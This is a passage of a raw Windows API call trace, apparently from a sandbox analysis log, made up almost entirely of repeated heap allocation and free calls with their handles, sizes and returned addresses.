dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2ac [0053.167] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xc20000 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc89de8 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc75258 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc86fb8 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc871c8 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20c) returned 0xc92928 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c48 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc92b40 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c60 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc75a68 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c60 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc92d50 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0053.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.175] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0053.176] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.176] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0053.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0053.177] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0053.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, 